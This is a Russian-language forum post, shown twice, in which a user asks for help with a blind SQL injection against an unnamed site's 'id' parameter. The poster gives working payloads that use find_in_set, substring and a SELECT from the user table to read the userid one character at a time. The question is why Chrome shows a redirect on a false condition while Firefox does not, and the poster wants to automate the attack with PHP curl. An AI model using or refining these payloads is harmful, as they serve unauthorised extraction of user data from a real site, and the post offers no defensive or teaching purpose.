Cennarios
16.08.2013, 16:37
Доброго!
Может, кто кратко даст наводку в чем разница между запросом в chrome и firefox. При выполнении запроса в chrome вида site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'1,d,2,3,4,5,6,7,8,9,a,b,c,d ,e,f')--+ выдает актуальную страницу без ошибок и редиректов, меняя шаблон site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'т,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ заведомо убирая оттуда соответствие условию происходит редирект(условие для реализации blind). Ежели точно такой же запрос отправить в FF, то в любом случае выдает валидную страницу. Те даже если сделать site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'и,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ зная точно заранее что userid=1, все равно выдает валидную страницу, хотя в шаблоне 1 отсутствует.
Конкретнее - необходимо через php curl снять разные состояния.
P.S. Заранее благодарен!
Может, кто кратко даст наводку в чем разница между запросом в chrome и firefox. При выполнении запроса в chrome вида site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'1,d,2,3,4,5,6,7,8,9,a,b,c,d ,e,f')--+ выдает актуальную страницу без ошибок и редиректов, меняя шаблон site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'т,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ заведомо убирая оттуда соответствие условию происходит редирект(условие для реализации blind). Ежели точно такой же запрос отправить в FF, то в любом случае выдает валидную страницу. Те даже если сделать site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'и,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ зная точно заранее что userid=1, все равно выдает валидную страницу, хотя в шаблоне 1 отсутствует.
Конкретнее - необходимо через php curl снять разные состояния.
P.S. Заранее благодарен!